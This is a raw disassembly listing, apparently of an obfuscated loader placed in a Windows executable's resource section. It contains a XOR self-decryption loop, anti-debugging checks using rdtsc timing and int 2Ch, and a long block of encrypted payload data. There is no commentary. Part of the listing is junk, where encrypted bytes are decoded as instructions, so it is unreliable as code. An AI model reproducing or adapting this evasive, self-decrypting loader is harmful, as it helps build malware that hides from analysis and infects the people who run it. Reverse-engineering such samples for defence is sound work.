sub_100B006 proc near ; CODE XREF: .rsrc:0100B07D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_100B00E: ; CODE XREF: sub_100B006+13�j
xor [eax], dx
xchg dl, dh
lea edx, [ebx+edx]
lea eax, [eax+2]
loop loc_100B00E
pop ebx
retn
sub_100B006 endp
; ---------------------------------------------------------------------------
db 0EEh, 28h
; ---------------------------------------------------------------------------
loc_100B01F: ; CODE XREF: .rsrc:0100B068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_100B021: ; CODE XREF: .rsrc:0100B035�j
; .rsrc:0100B03F�j ...
mov eax, 4000h
xor ecx, ecx
jmp short loc_100B052
; =============== S U B R O U T I N E =======================================
sub_100B02A proc near ; CODE XREF: .rsrc:loc_100B047�p
; .rsrc:0100B04D�p
rdtsc
retn
sub_100B02A endp
; ---------------------------------------------------------------------------
loc_100B02D: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_100B039
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_100B021
jmp short loc_100B047
; ---------------------------------------------------------------------------
loc_100B039: ; CODE XREF: .rsrc:0100B02F�j
mov dx, cs
shl ebx, 0Ah
js short loc_100B021
jnb short loc_100B021
cmp dh, bh
jz short loc_100B021
loc_100B047: ; CODE XREF: .rsrc:0100B037�j
call sub_100B02A
xchg eax, ecx
call sub_100B02A
loc_100B052: ; CODE XREF: .rsrc:0100B028�j
neg ecx
push ebp
add eax, ecx
mov ebp, [esp+4] ; CODE XREF: .rsrc:0100B0A7�j
sub dword ptr [esp+4], 1FF6h
sub eax, 100h
jnb short loc_100B01F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_100B006
add eax, 214B9D28h
aaa
loc_100B088: ; CODE XREF: .rsrc:0100B093�j
lodsb
int 1Ch ; CLOCK TICK
cmpsb
mov ebx, 60EC55BAh
adc [eax], edx
lock jp short loc_100B088
mov bl, [ebx+59788A99h]
push ecx
sub cl, ah
cmc
cmp al, 0ECh
mov esi, 0A7DB4398h
jl short near ptr loc_100B057+1
; ---------------------------------------------------------------------------
db 0FEh, 5Fh, 7Ch
dd 0D6E9ADDCh, 3F7D92BEh, 3759492Ch, 88273525h, 0DDAF01ABh
dd 0B1A29090h, 0DDFFA28Ah, 0DAF116B9h, 0D251B7EDh, 0F7F7CF7Ch
dd 8CE46919h, 22E6F511h, 4C984810h, 3B67476Ah, 9594F78h
dd 8E415426h, 1D8F9438h, 9B5B5707h, 0C28A7199h, 0ABDDB0B0h
dd 95C1A6A2h, 69A9A89Bh, 4DE2B581h, 0B170DDF3h, 4B2009F3h
dd 622735D1h, 16521350h, 0F11D0214h, 0C2001A10h, 687CC695h
dd 0FE572925h, 0CE59C3F3h, 86C8DADEh, 0F25AFF31h, 600AF8F6h
dd 6CD98BE1h, 9EA63505h, 76DAC943h, 29D26363h, 0A3586F02h
dd 0C6DA1291h, 0D19698BDh, 0FD2D1A3Ch, 0A8C4D6E6h, 4A6682Bh
dd 0A5F30434h, 7322C2AFh, 0E995BF31h, 4237795Dh, 61F3ED96h
dd 2E65475Dh, 0B27A66A9h, 4DCCA5A4h, 0D4BF8D06h, 0E1B4D2D2h
dd 8727EA83h, 28DF2D1Dh, 2D46AF19h, 432CA2D3h, 0E8BD4674h
dd 847B4869h, 3EE17399h, 0B2499EBBh, 0E4055DA0h, 21A7899Bh
dd 73B1CF26h, 0ED5E731h, 4FFFBA77h, 54C11753h, 5B193B2Ah
dd 41D1C7C8h, 0D52F5968h, 0F25E700Fh, 0DEE07886h, 438CAEB1h
dd 9A27BA74h, 63BACCC8h, 1BD1566Fh, 0CD6CF9C9h, 38F605A9h
dd 4FF8A626h, 0EB2C0E2Dh, 4D52A8C1h, 6BFF9F6Bh, 8B9D0060h
dd 0CAE26612h, 54C67183h, 0C0AC6752h, 8C662CDEh, 0EB47C09h
dd 63E64BF2h, 4A11204Ah, 83BDC539h, 0FA3F617Bh, 50D348A3h
dd 0A595FB71h, 0D4139695h, 0BD9AC7ACh, 6CB2C0C3h, 2C9DBB2h
dd 0FB4A0EF1h, 0B5F63823h, 9C8910DEh, 34243637h, 75531D4Ch
dd 0E6526063h, 0AF81BA7Ah, 0EA81F8C6h, 0D097A8C0h, 93B3FBFh
dd 97C5E7FDh, 16DDEEE7h, 71290FBh, 46E21C2Ah, 0B3213331h
dd 713848E2h, 6B166135h, 606C127Ch, 8651E618h, 0E654DA4h
dd 0C8AE0038h, 0F4C2D4E2h, 12DB666Dh, 28F6EA00h, 6B491916h
dd 56527C69h, 4128D2BBh, 31C15E6Bh, 9B5362CCh, 0FF745BAh
dd 0C9A18FD9h, 83BB706h, 0F7BFD30Ah, 227F5566h, 2AECFECCh
dd 3C014C97h, 2E9FA72Ah, 9531736Dh, 4C75B28h, 986F5A56h
dd 844F3507h, 39729FADh, 5AABB6B4h, 0F4BBCFF1h, 27436169h
dd 5217FAC9h, 0BE7A9E11h, 0CE16180Dh, 5606B980h, 7DBBA954h
dd 8FDC626Bh, 20728480h, 0F2A51A1Ch, 0D8D04DB0h, 0DB3A4C48h
dd 0BA4FE0EEh, 1ED4DD78h, 34FBF2F3h, 4AEEA32Dh, 0EFA23B39h
dd 79707ED5h, 0E1A87084h, 3DEB0F7Fh, 3F85A7BEh, 0E5B73411h
dd 0EC4C3AC3h, 0D84DD3DAh, 0F2E0F2F0h, 30F708EEh, 6BF19D93h
dd 91AE3705h, 0ACCA4E26h, 0F57159Ch, 0E3007F9Bh, 0D0D66A92h
dd 5C80C0A8h, 0D8BA560Ah, 0FFDA61D6h, 1250EFEDh, 0D30BF849h
dd 0CEA07BE5h, 5A227935h, 0DA5F4B48h, 235425D2h, 0F9CB9D44h
dd 3D857226h, 0A595CD70h, 0E4ACDEEFh, 0FBA91959h, 12B02862h
dd 28F10368h, 6E48701Eh, 6115B7Fh, 41BFDDBBh, 7155F6Bh
dd 0CF0C36B6h, 397B8DE9h, 4292CE74h, 8AADD17Bh, 0A5C2B8CEh
dd 5ABFE98Fh, 4FEDFF9Ch, 0C36E4713h, 0DE8ED27Ah, 3532746Dh
dd 8EB6DE01h, 98614FEBh, 0AFC20486h, 7F8E908Dh, 0DDA5BFA1h
dd 514F2140h, 1BD30863h, 0A764FBC9h, 39300616h, 0C59AC9D8h
dd 671E596Ch, 3FD0A807h, 7D5C5E40h, 0AC738595h, 0A8E5F3D6h
dd 0A8F1C3C4h, 9DD1BCA1h, 5EAA86BAh, 7A909B97h, 0CAAC0E4Ch
dd 7C38FCB6h, 0BEAFB53Ah, 2A41637Ah, 0FB78003Ch, 3DFA7E80h
dd 3A86A8BAh, 0E9E8F06Dh, 0BBB6AC52h, 6E1F568Dh, 0A09A1F3h
dd 62F80A09h, 2A6A657Ah, 2D765F43h, 1A543924h, 8D310101h
dd 79FE822Dh, 3082A4B9h, 84CFFD6Dh, 16E79490h, 30EBA042h
dd 7196CEEh, 0E061F952h, 2E0B2D30h, 0A4205E32h, 42154EDCh
dd 8878DB60h, 8BF07977h, 9372196Fh, 5B6AF0F1h, 0E59C92EDh
dd 594023E0h, 13EAC007h, 0D6A65701h, 70244F82h, 23DFB42Eh
dd 90B50E19h, 7AA32D58h, 0F66C5207h, 4C51E78Ah, 0FABEE934h
dd 95693EB8h, 0D284113h, 3CD7E9E2h, 160E6E34h, 11E9932Dh
dd 7C6E2D1Bh, 7BD285C3h, 0D6195B59h, 0C9312420h, 2588DAD7h
dd 0C7BE8B63h, 0AAFC7730h, 0D1C831C3h, 0E1566AEBh, 0CBE9CBD6h
dd 0C5FFEF7Dh, 9C82D67Bh, 832E7014h, 5781D6CEh, 0C15C6E6Ch
dd 86BE107Bh, 51759CABh, 0DB91987Fh, 0D422420h, 9CFE11Fh
dd 13BFF7F7h, 67AD5FC7h, 4D124D75h, 0A0A13C3Fh, 772B0303h
dd 510AAEE2h, 0FD19E4D6h, 3F667097h, 42105051h, 0EE84D389h
dd 559A8C8Eh, 3730660Ch, 0F67B0A3Ah, 0B684E200h, 607E606Fh
dd 773D6F1Ah, 8E5476C7h, 0A56B7D7Dh, 0BC829493h, 0D399ABAAh
dd 15E39490h, 31EC004Dh, 0B48444EFh, 0D581C682h, 19C8F3FEh
dd 39515571h, 16542A04h, 0E0322D05h, 0D2131A1Dh, 0DB1BC3D3h
dd 0BDFCF1D2h, 8AACCBC9h, 9EB1A1A7h, 78DA988Ah, 46837771h
dd 208747Dh, 2C7E545Dh, 35F0E23h, 0C54D1E38h, 0E9051306h
dd 0D812CBEEh, 0BBF3E9C7h, 85C7D2C9h, 8B83D291h, 75A38882h
dd 44828DAEh, 7F776570h, 30696E2Ch, 3E573022h, 0F726363Fh
dd 0E8082614h, 0B113E8EDh, 0A9EBD2DCh, 0B7F1D2C2h, 92DDABBFh
dd 68A1A6E4h, 708C8F9Ah, 536C7D7Dh, 6167454Ch, 8401372h
dd 0EF2D2427h, 0EF196E1Ah, 0C627F1ECh, 0A1EBF9EEh, 0A8C4F4B3h
dd 96D4A38Ch, 78BB95A0h, 55909591h, 37BD7D6Ah, 8674062h
dd 364F5055h, 7C24293Ah, 0D52C0F2Dh, 0FE0AEDE8h, 0C1E3F5F1h
dd 95E9CAE8h, 83C1A2A9h, 6AA29BB8h, 7080BD91h, 74F84B6Eh
dd 25425544h, 44A4D5Ch, 1C532E07h, 8F15030Ah, 0F51F183Ah
dd 0D8F6E7EDh, 0A6F0EFC6h, 84C4A1A7h, 286A0ABh, 4DA98AB7h
dd 69846B62h, 86E7174h, 1C475955h, 5C0C4Bh, 0FB3D0736h
dd 0CA131829h, 0DC3990D1h, 0A2F0F1D3h, 89C3D7CDh, 8AA692D5h
dd 66A889BAh, 6E9F6C6Ah, 5085B61h, 36494555h, 155B3D2Bh
dd 0E82B3117h, 0EA051B07h, 0F415E2E5h, 0B8F7E3A3h, 87C7D2EDh
dd 0BEB3A5BEh, 72B29B81h, 519F908Bh, 50685116h, 17774C4Fh
dd 0E5D2828h, 0E526175Bh, 0F9093E16h, 0CB05E8FBh, 0A8C3A0E1h
dd 85CCE1C7h, 0B1DA81B9h, 0EB6898Ch, 4B8C8BB3h, 596C7B55h
dd 23674867h, 2B492E28h, 0E4351858h, 0F72E3E01h, 0DC00E0E5h
dd 0A9F8CC9Dh, 0AED2D6D7h, 9DFEF8F8h, 0BBB9290h, 418A85A9h
dd 0B8F7D75h, 37766B14h, 3783C49h, 14073735h, 0C7580F07h
dd 0C229F5E7h, 0B6C7FDF5h, 0BBF4DDC4h, 83D1B2B2h, 6298DD9Fh
dd 7288B581h, 5D975A69h, 396A554Ch, 16436B39h, 1C512616h
dd 0F5390F33h, 0C2072E7Eh, 0EB82E4F0h, 0A5F8C6C2h, 9BD5AB95h
dd 6A81BF95h, 4CDD8A9Dh, 45807461h, 2B4A717Fh, 5E415B59h
dd 150391Bh, 0E0392406h, 0D729791Fh, 0CF14F4D0h, 0A3C5D3DBh
dd 84C5C8D6h, 8CA6B2B3h, 73B183B9h, 58BF036Ah, 226D6859h
dd 33595445h, 3F362D24h, 0ED3F1C2Bh, 0CF010217h, 0D318E2FFh
dd 8392D7D7h, 81DBF8CFh, 0ABA5A6B3h, 77B4869Bh, 50AB7373h
dd 7C715916h, 227D4B5Fh, 0E561621h, 0EA25352Fh, 0D6153D72h
dd 0DB2EFAE8h, 0AFC0D6C5h, 94C5DDE4h, 0F7D3A0A7h, 7E9B92ABh
dd 4CAC9299h, 7201767Fh, 3668655Eh, 55D112Fh, 0F2353D3Bh
dd 0FD36003Bh, 0DB3A86E8h, 0A8EEEDD2h, 0A9C1D1E7h, 0F4D7A4A2h
dd 798096ACh, 41838C96h, 4A945964h, 23755352h, 9465870h
dd 33422D26h, 0F12C3A1Fh, 0D223FBF0h, 0AFE2EDEAh, 0B6F8DEF9h
dd 84D4AAB5h, 7A2B1B7h, 6CB580BBh, 629C7F65h, 3E64504Bh
dd 76A5558h, 4C3F3Dh, 0FC213567h, 0C405102Bh, 0EDE6F1FAh
dd 0BBF3DED8h, 0ADDE97A4h
dd 50A1A9B4h, 74B78285h, 63A2076Fh, 26784D5Fh, 2E564147h
dd 1A562F4Ch, 0E3220610h, 0D70D1119h, 0D410F291h, 0A5F5CDC6h
dd 9CC8D8BFh, 8BB7B9BEh, 77B5948Fh, 5EF26169h, 437F787Fh
dd 3E4E5742h, 12583A48h, 883A0534h, 0FA11193Fh, 0C219E0FFh
dd 0BEFCC9E7h, 8ACBF4DEh, 0FBA4BFB6h, 77AC84A0h, 5C8A6F72h
dd 7C727D51h, 33734142h, 9513227h, 0F02A2908h, 0F52B7417h
dd 0DC0BEEFDh, 0B9DFD6C5h, 0E0E6D7D2h, 92CABE87h, 7AB08997h
dd 4B8E8DB3h, 7D6E6646h, 2777622Ah, 0F5E3024h, 0E0220B2Ch
dd 0F437360Bh, 0EB3487E3h, 8FDCDFCBh, 998D8787h, 0A6BA8087h
dd 67928487h, 69828A96h, 6AFE6975h, 3F5A4043h, 3675058h
dd 3C3B102Dh, 0F33F3E6Bh, 0D914F6D3h, 0AEE9CCE0h, 0A1DAD4C5h
dd 95E4C886h, 73A88CB9h, 6B8F94A3h, 75824969h, 4EF8A022h
dd 0A79F212h, 913F5150h, 937224EAh, 0A2077F14h, 0D4D7C6C4h
dd 855726A9h, 0B8E21048h, 51989BB0h, 874A0EA2h, 0B3F63824h
dd 0D2F213DAh, 5E141A90h, 0B63389CFh, 25D7E934h, 90694B6Fh
dd 0BAEAC26Eh, 4468A7C2h, 0E89EECF6h, 7BCA1753h, 16DCEE7Dh
dd 4CA76D54h, 97811C1Ah, 96AA335Bh, 71500A22h, 0E24F715Fh
dd 9F0C2A74h, 0B61DDBE5h, 9C94CCA4h, 7154EDE8h, 0FBF2F85Fh
dd 8726B2B6h, 28C029CDh, 6373E693h, 439EBDA6h, 61D64774h
dd 944CCBD6h, 4A607542h, 6085DFDEh, 0E5EC262Bh, 6F25BA87h
dd 0F7BFCAF6h, 0F129BC0Dh, 0B4697503h, 0B103253Fh, 5301A9A5h
dd 9572AB41h, 4C3A5A7h, 986F5DEEh, 0B4FA070Bh, 0F4659F9Dh
dd 565B494Bh, 0C497484Eh, 7F1261E2h, 0BB6777F2h, 0D0FF110Bh
dd 0B0E9D73Bh, 0A572F8B6h, 7D44BE01h, 15066D6Bh, 9B68026Fh
dd 4F40A899h, 0E9805235h, 0A1E398C7h, 569FB08Fh, 32E5630Ah
dd 307C0D3Ch, 8687DB06h, 3F290B12h, 2C405692h, 9057698Fh
dd 4AEFDD7Eh, 0BEB58D20h, 401151C6h, 0EC83DF43h, 23078E8Ah
dd 1ACAF2D5h, 56FBCD8Bh, 5DC8A5D9h, 7EE83705h, 6FF4CB8Bh
dd 8C776553h, 60377C50h, 0BBEB92FBh, 0A2679957h, 6DBA3EBBh
dd 9736AC16h, 16DDEFE6h, 2FAFD68Fh, 0F686214Ah, 5A122ED5h
dd 7035F1C3h, 2DB625Fh, 9F67787Eh, 7D55688Eh, 3E5E2CC4h
dd 0E1D8DF1Dh, 10363795h, 1D1D6F2Bh, 7B258857h, 6B58D69Dh
dd 44E7147h, 0F8C9B72Eh, 847D73C6h, 1068B2F1h, 8257841Ch
dd 4A458FA0h, 0E76EBC5Dh, 0F728D2A4h, 0CDD4BE6Ch, 91A6A95h
dd 0B8011623h, 93282522h, 0E328F403h, 0B165ACCDh, 1582856Fh
dd 51DDE8C4h, 56FD554h, 0DDA55FE1h, 75E1CECBh, 3BC8930Fh
dd 0D97470F9h, 0BA00223Ch, 501F0D5Bh, 6797C431h, 92C45755h
dd 955C6C64h, 0AD77EDD7h, 56759C9Ah, 0DA919F98h, 75353643h
dd 8CEE5FBh, 1F8FA7F6h, 35FC0AE5h, 18417323h, 0F6D56B3Ah
dd 7A717F74h, 6D5A35Bh, 0A86F807Bh, 0BDECC9C7h, 0BE9CC5FCh
dd 0ADB4C6C4h, 0F55E2289h, 8DE1C3D9h, 6A8CFC8Ch, 4C67754Fh
dd 8263837h, 5619FBB2h, 72546666h, 9447A4EEh, 7B07CD92h
dd 0C67ABDDDh, 83644990h, 57968BD7h, 624810B8h, 74F43629h
dd 947EDD9Eh, 96B7CB64h, 0FF397B62h, 0DE022637h, 2D3F3D1Dh
dd 0B77F9419h, 0EA60CA5h, 16F5AED6h, 0AC938578h, 438ABCBAh
dd 0D064FC53h, 0C1082A3Ch, 571D39EAh, 4A42B745h, 4CD8A054h
dd 0CF64465Fh, 9FB21875h, 8CFA491h, 0DF29BBBCh, 0BEC1A7C5h
dd 1AAB646Dh, 3F0EFFCDh, 2D048399h, 85182D1Bh, 0EFE0BB14h
dd 7DC15499h, 96607270h, 0B0777903h, 0FDB0209Eh, 5EE3A7C0h
dd 71B3CEF2h, 0CD3E502h, 56C9C57Ah, 48154E0h, 16596078h
dd 0A7A5624Ah, 30441190h, 0FC0DA046h, 0FE25D484h, 0E84B0964h
dd 0E0F8B382h, 4D3DC508h, 0E0CFE1E0h, 20E5F746h, 64AC308Fh
dd 0C81C736Dh, 642A3C9Eh, 0D74995D1h, 16576755h, 0A96F8119h
dd 33F3B8ABh, 0D8A79302h, 0EEB44A40h, 25C670DCh, 21C1D3D3h
dd 469D6D2Bh, 75A35E55h, 0E15A4D17h, 1F1DB030h, 0FF211211h
dd 0D56803FDh, 0C9ADBBA9h, 2CDE6DC2h, 5081CDC1h, 1C7FEC8h
dd 0E78F0D18h, 1ED86F93h, 15CB2E1Ch, 0B4726463h, 73394B43h
dd 0E4270D25h, 0C5061614h, 69EB6F8Fh, 4A95978Ah, 0D59ACA7Dh
dd 6465C1Dh, 45DADCC7h, 2AF2036Ah, 17594B9Ch, 8D8ACE7Fh
dd 0E236786Ah, 0B6562FC8h, 54572674h, 0E62BDCDFh, 5E6DF5F3h
dd 0E29997B8h, 6E4D657h, 20FC2472h, 0A72E07FEh, 0E117998h
dd 96E22C2Ch, 681618C8h, 83495BB2h, 77E12F71h, 0B14794F5h
dd 0F8CD1D14h, 6A2EB786h, 0F68CFE86h, 80581EE7h, 24D9CBBCh
dd 0BE8BB7E1h, 5227196Ah, 5911D5CBh, 5465767h, 976C5E59h
dd 261B870Ch, 3A8A9C8Fh, 0EC8DDA26h, 0AF7121CAh, 63B984A5h
dd 71B9929Bh, 5E8F7767h, 37F4446h, 17455159h, 0AE72532Ah
dd 650AA5E1h, 4BECD358h, 0C2C6F29Bh, 0B2CFF856h, 54014BDEh
dd 0BFCBEDC0h, 1DE1F3E3h, 0CDB50E86h, 2CF0DEDEh, 2C22B593h
dd 783D4F4Fh, 0C8D9CD00h, 4259D679h, 5F29F238h, 0E70C2650h
dd 0BFB0F2F2h, 0FD95DFB3h, 29F17665h, 0B808D07h, 5ECF9E15h
dd 0D82DF4B1h, 74394AEEh, 0AB386208h, 0F4677978h, 2C819BFAh
dd 0D0A58B06h, 6CA0E035h, 634AC59Bh, 15EADCDBh, 1BCA8E8Ah
dd 0A1891A29h, 56E0C130h, 705C1B16h, 32B25934h, 9E544646h
dd 993E1873h, 33C2A493h, 0D399880Fh, 37552DD1h, 49D7D9C3h
dd 277E3F7Ah, 3F054292h, 6D9A4B2Dh, 61461E09h, 0E9DCA408h
dd 7260425Eh, 0B27788C8h, 0C9461E2Dh, 57AAB7B7h, 8331D080h
dd 0ABBFAD4h, 72E9FBFDh, 102187ECh, 441291Ah, 41C7D5BEh
dd 0C2CE5768h, 139F6D53h, 7C70FDD6h, 4DAAEE16h, 0E92CABFEh
dd 0F7159BF8h, 0AB76021h, 5080A49Ch, 0CA1E0B64h, 66BECE7Fh
dd 14A11831h, 8E420A70h, 9B4438E0h, 0A8218535h, 40B2134Ah
dd 97165CB3h, 0CF014FCFh, 8CCBEDEEh, 2954C8C3h, 46F83A3Ch
dd 7CBA0AA1h, 59260809h, 490D74E5h, 0E1D76967h, 94948281h
dd 0FD371D55h, 5C999B9Ch, 0DC80854Eh, 699789DAh, 1BB7BFF2h
dd 30F40660h, 0C2F44A9Eh, 5E12214Dh, 5EC8DEB3h, 1AF6253h
dd 0A3576C02h, 0B5816812h, 2E6A9C2Ch, 0DB293740h, 95C3E5E6h
dd 40DA86EDh, 4D64FC54h, 0C8082A36h, 6A2F76B4h, 73D68948h
dd 88270F0Fh, 0B359E389h, 33F28DBDh, 0CDA294EFh, 0E4C36F30h
dd 0ABF22D80h, 22E45C16h, 0BD110030h, 3F353B4Fh, 662FABA6h
dd 69BA4574h, 49DFA37Fh, 10614359h, 7F3B6DAh, 0C9BF91EBh
dd 0D4BCEC3Ch, 62963145h, 0EE4D6D2h, 15AD7177h, 17AC1323h
dd 0A9FA81E8h, 775BC4CCh, 0D0175868h, 0C90C3F3Ch, 83751379h
dd 39DB9DADh, 0ED897921h, 879C08CBh, 6EEAC8D8h, 4E849997h
dd 78C76B75h, 23714E55h, 48190E51h, 512E3830h, 0C7595A46h
dd 0EE24D1DBh, 0B7C4C5D4h, 0B7FBC2C2h, 9EDA84B3h, 6BA3ACAAh
dd 429691A6h, 428B6E5Fh, 3875414Bh, 34F6A65h, 385A3522h
dd 0E3300404h, 0C63C220Dh, 0DBEEF4E7h, 0A6E8C9D8h, 9ED8859Fh
dd 6FA9ADBFh, 76B1A09Dh, 6C8C6461h, 296D6A4Dh, 3A515451h
dd 13553E1Ch, 0D0340F0Ah, 0CB1C0F3Bh, 0C016E3FEh, 0A1D7CCCDh
dd 8BC4D3CFh, 90ADA2B7h, 5A879E83h, 2C86776Dh, 174F5449h
dd 1F727366h, 125E0414h, 0E73D0F2Dh, 0C8390310h, 0D918E0E4h
dd 8ECFD6D3h, 81D8CECEh, 9E97A7BCh, 7DB1999Bh, 50AA5D6Eh
dd 4D697466h, 21D5D48h, 8533425h, 0F724152Fh, 9B607406h
dd 0F62ADB89h, 0BBE0BCB0h
dd 8DCEC1D8h, 9CCABEE0h, 7EB98997h, 4B82D39Dh, 72027B75h
dd 73526863h, 142252Fh, 0E9333D21h, 0DD0D2565h, 0E516A7D4h
dd 0E6C2D7D2h, 0AFCAC392h, 0FE89B9BFh, 0BD10BB7h, 0A3BAF9F9h
dd 8DEF6FDh, 2090E126h, 662C0E28h, 516EC0ABh, 7C9B6C5Bh
dd 0C120F79Dh, 233D1187h, 809F819Bh, 8598F46Bh, 394CB9F4h
dd 3D96E80Ah, 180BB181h, 3D9A2312h, 48D6D3Bh, 77BADCF5h
dd 1F56584Ch, 97464BFBh, 0F80D6C95h, 2BD52156h, 0EB37538h
dd 0FC7C5615h, 72DFC1DDh, 30F6090Ch, 7E98E048h, 0B7240619h
dd 753B4DC5h, 99FBE1EEh, 0C9397B4Ah, 458EF891h, 0E1BBE03Dh
dd 0CCD243BFh, 8EB0D3DEh, 16DCE605h, 6FB55604h, 0F465834h
dd 47B4CC31h, 7A387A64h, 0E25B159Fh, 0F78E2874h, 49827074h
dd 0FDBF7F31h, 906B38BBh, 13122BD0h, 12D9EBE2h, 77B34453h
dd 7B294A59h, 0A91E7C61h, 5D195AD1h, 7D0DB65Bh, 2EEE8A8Dh
dd 0B24AA076h, 0C990A7C8h, 7557ECB7h, 0F78FFDEFh, 0ED6E50Dh
dd 77A8A2FCh, 6E46435Ah, 75F7079h, 95674302h, 0B163B3CDh
dd 9858996Fh, 0E72A8886h, 95D9CCD2h, 485BE0B4h, 0F48BE622h
dd 5A832DD1h, 48B9F993h, 38FF7911h, 0B0406826h, 5606CEA8h
dd 82BCD554h, 190B4E1Fh, 9B5E7B17h, 59041699h, 0B3A08297h
dd 0EADF9BC7h, 56CEE0DEh, 6B7109A5h, 0CBFB3D20h, 7B39E9B7h
dd 6222D339h, 2A155250h, 0A2643B22h, 0EB22C450h, 0FF106895h
dd 3D9C9E80h, 0ECB3C5C9h, 71BAAFADh, 7C949C98h, 0CFA70949h
dd 7725F98Bh, 0BBA0BE35h, 7A3C7E67h, 0DEDEE852h, 2A6A4C63h
dd 8AAD6414h, 4467FBA8h, 0E89FEDFEh, 0FFC2B045h, 0A350EFEDh
dd 2CC41F5Bh, 9EB69043h, 0B222041Dh, 8EC6B9B4h, 2CD5A539h
dd 9F674956h, 10DB13DDh, 0CD959784h, 0C4C82B36h, 0AF93D5E2h
dd 12B0ED83h, 28F36B52h, 0AAF79A16h, 562F1DCCh, 186C88C1h
dd 13C0D279h, 0C9644652h, 7F68BE3h, 0C9A28404h, 0B0F9EDE3h
dd 623F809Fh, 0EE7C500h, 0F87800A4h, 0FA04263Fh, 6335D3AFh
dd 4DA4441h, 7EB6A4AAh, 0A8720FE2h, 0E3F24E86h, 908E9088h
dd 3596E8E0h, 0B433C92h, 1E9F6025h, 76BFFBC9h, 73E8264Fh
dd 97E8D6D5h, 573B0CBBh, 213D0155h, 67678658h, 29B47A7Ch
dd 0C3BA89D6h, 8ED7D6E7h, 743503FBh, 8FFD190h, 4EB4A6A7h
dd 64AD5F5Dh, 6026B0DCh, 0F6D53C0Ah, 7A717F7Ch, 0E44782A9h
dd 0A863690Bh, 0F7D59896h, 86DCF8E1h, 0A1F0E88Dh, 9134DD97h
dd 1BD1DFB3h, 31F806E1h, 1B47721Fh, 3E704C53h, 37583A21h
dd 18AB3664h, 0A45B56A2h, 44371901h, 0BA999B85h, 0E9B0C208h
dd 0FFC7B381h, 27F1F67Bh, 0FF618B05h, 0C90B2D04h, 6B0FF38Fh
dd 256B1D49h, 0A2B5F79Fh, 64E47947h, 58EB1D82h, 9E9597BAh
dd 0B3ADD4EBh, 0FCC1BD81h, 0C0256CEAh, 0D60B1EE9h, 72B599E8h
dd 571F013Bh, 0E65E4331h, 7A4D5F4Fh, 0AC481FE6h, 0B377658Ah
dd 99C5A4A1h, 0D2E2F8F7h, 0B484FCFDh, 9A28E9AAh, 26DDD3BCh
dd 3D037E87h, 0E1962D2Bh, 6B025CF4h, 2FF4D600h, 7160425Ch
dd 4F88780Bh, 0C78EAC76h, 90ECE0B5h, 0A1F98085h, 409FA1CDh
dd 627C04FAh, 0BF00223Dh, 649326E8h, 0FB2E403Dh, 7F45523Eh
dd 62E9E36Dh, 0F473B59Ch, 0E8432116h, 8E49B382h, 71473538h
dd 39E32C5Dh, 0A4EAF7F7h, 36FC0C1Eh, 4C83C9A5h, 0C7E3C3Bh
dd 7B415253h, 0BEF5FF96h, 6DEE81B0h, 0C0869907h, 0BD4924FEh
dd 7B4B94C5h, 5FBF111h, 69B83376h, 21706207h, 0DCF02120h
dd 6016145Eh, 0CABEADA5h, 8E6446C3h, 2842087Ch, 8CA23E16h
dd 4666FBAAh, 0EA80EE78h, 85C8195Dh, 18DDEE66h, 0A5F8468Dh
dd 0CA3BE21Ch, 6C0292B6h, 8DBC8D4Ah, 8B50524Fh, 0A00D7912h
dd 2D8192E5h, 0CFA58B63h, 0E953463Eh, 0FDC2B550h, 81577FEBh
dd 2AC123A0h, 125A0A72h, 74AAA4D0h, 0AFB34876h, 870DDA52h
dd 20E97674h, 0B44BAD4Fh, 0BA7AAC13h, 8A56444Fh, 0F9C0D244h
dd 9931C2B9h, 0D8B9DBCAh, 0E282780h, 87A6A02Ch, 0DD327463h
dd 751BB35Bh, 0FED8D8Eh, 0B147A937h, 0DCE6A0F5h, 8DA5B7B6h
dd 3729319Eh, 80D3D5C8h, 0A9FDDFBFh, 0B305D87h, 0E4187929h
dd 4D6ACB4Ah, 88A59643h, 855D246Ch, 0E46187CFh, 0E1CE979Fh
dd 0D34033BBh, 0A2B02A0Bh, 1AEBA5EAh, 0ACB5C507h, 7D0F1B2h
dd 4E0FCD25h, 4B0F3C3Ch, 52612B65h, 0A978444Ah, 844AA4A4h
dd 0B9A3E0A0h, 0D2EE8A8Fh, 0A1FD898Ch, 0F99CDDFDh, 2DCA1661h
dd 9F3C8B0Bh, 200F2121h, 32716838h, 54FCDAB0h, 2DF6656h
dd 0A65B684Fh, 0A66194FEh, 859462C0h, 0EBB0C72Ah, 66E2FFD9h
dd 0E68AEFFAh, 1FDFE392h, 4ACF9E1Dh, 3529DF64h, 74394B43h
dd 0AB88DFEFh, 0F1307949h, 95BF056Fh, 1010A797h, 5221EAC0h
dd 0FEF3F92Ah, 0E8496Fh, 0A6F10333h, 7226E494h, 33D11A30h
dd 23601947h, 0ABF0CAA1h, 66E77645h, 2454F38Ch, 791F5A28h
dd 0E3999745h, 5432DF61h, 0F9B7F99Dh, 0D71209A5h, 0DC136477h
dd 576CA024h, 0A2B9AEAFh, 39C49570h, 9B505E8Dh, 45F02D7Ah
dd 36DD194Bh, 0D0890622h, 98014ECEh, 0FD3D5F0h, 1581D188h
dd 0C3001266h, 633B40BFh, 9493C041h, 81456776h, 1D9B7F1Bh
dd 0AF43A520h, 0C68A9C9Dh, 0F35F3672h, 1DB8CAFBh, 0F4301FEAh
dd 22E135A4h, 1603BB9Dh, 0B0452516h, 560631A8h, 82B9D054h
dd 94E3EE64h, 2EE68182h, 0C2B6A89Ah, 26CBAFDAh, 0C0989B52h
dd 80B58DEh, 1EE15771h, 6438210Ch, 1B0C4B72h, 624E3953h
dd 2FFD4F50h, 0BBA5F398h, 5FE87D4Eh, 8C069B6Ah, 5C99ABA8h
dd 0DC80C546h, 84A54DAh, 97DDDFC1h, 0C4159Dh, 2D594C1Eh
dd 0CBDD6435h, 75096759h, 83AF9AE0h, 0A36379FEh, 457EFA91h
dd 0E1A5A01Dh, 0F93941BFh, 7CC3E5FAh, 92D51315h, 2CF100EDh
dd 73139F93h, 932C3101h, 21678B4Bh, 0D949350Eh, 0AF63C389h
dd 23848DBDh, 0CDA28F51h, 60A67B3Eh, 0FBC0D117h, 975E20DAh
dd 28DE301Fh, 57544647h, 56132E32h, 28A6BA14h, 14A6C77h
dd 0E5E57CB2h, 3B788A8Ah, 0F9BF8225h, 0AB2D7BB7h, 97EE77F6h
